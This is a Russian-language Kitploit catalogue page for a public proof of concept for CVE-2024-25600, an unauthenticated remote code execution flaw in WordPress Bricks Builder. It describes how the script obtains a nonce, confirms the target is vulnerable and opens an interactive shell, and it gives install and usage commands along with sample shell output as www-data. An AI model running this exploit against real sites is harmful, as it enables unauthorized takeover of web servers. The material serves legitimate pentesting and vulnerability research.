Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-25600-WordPress-Bricks-Builder-RCE-PoC — Уязвимость неаутентифицированного удалённого выполнения кода в WordPress Bricks Builder <= 1.9.6. Конечная точка рендеринга шаблонов принимает PHP-код без аутентификации, что позволяет выполнять произвольные команды от имени пользователя веб-сервера. | Kitploit
Инструменты/GitHubGitHub/estebanzarate/cve-2024-25600-wordpress-bricks-builder-rce-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubestebanzarate/cve-2024-25600-wordpress-bricks-builder-rce-poc

CVE-2024-25600-WordPress-Bricks-Builder-RCE-PoC

Уязвимость неаутентифицированного удалённого выполнения кода в WordPress Bricks Builder <= 1.9.6. Конечная точка рендеринга шаблонов принимает PHP-код без аутентификации, что позволяет выполнять произвольные команды от имени пользователя веб-сервера.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
16 месяцев назадЕщё не проверено

CVE-2024-25600 — WordPress Bricks Builder RCE (PoC)

Неаутентифицированная уязвимость удалённого выполнения кода в WordPress Bricks Builder <= 1.9.6. Конечная точка рендеринга шаблонов принимает PHP-код без аутентификации, что позволяет выполнять произвольные команды от имени пользователя веб-сервера.


Как это работает

  1. Получает nonce Bricks из исходного кода страницы цели (требуется для взаимодействия с конечной точкой).
  2. Отправляет тестовую нагрузку, чтобы подтвердить, что цель уязвима.
  3. Открывает интерактивную оболочку, внедряя команды через конечную точку рендеринга.

Требования

  • Python 3
  • Установите зависимости:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit

Использование

root@kitploit:~
python3 exploit.py -u http://TARGET

Пример:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10
[*] Fetching nonce from http://10.10.10.10 ...
[*] Checking if the target is vulnerable...
[+] Target is vulnerable!
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ссылки

  • CVE-2024-25600
  • Рекомендации по безопасности Bricks Builder
  • Разбор Wordfence

Авторы

  • Обнаружение: Snicco / Calvin Alkan
  • Оригинальный эксплойт: K3ysTr0K3R
  • Очистка и упрощение: Esteban Zárate
Скачать инструмент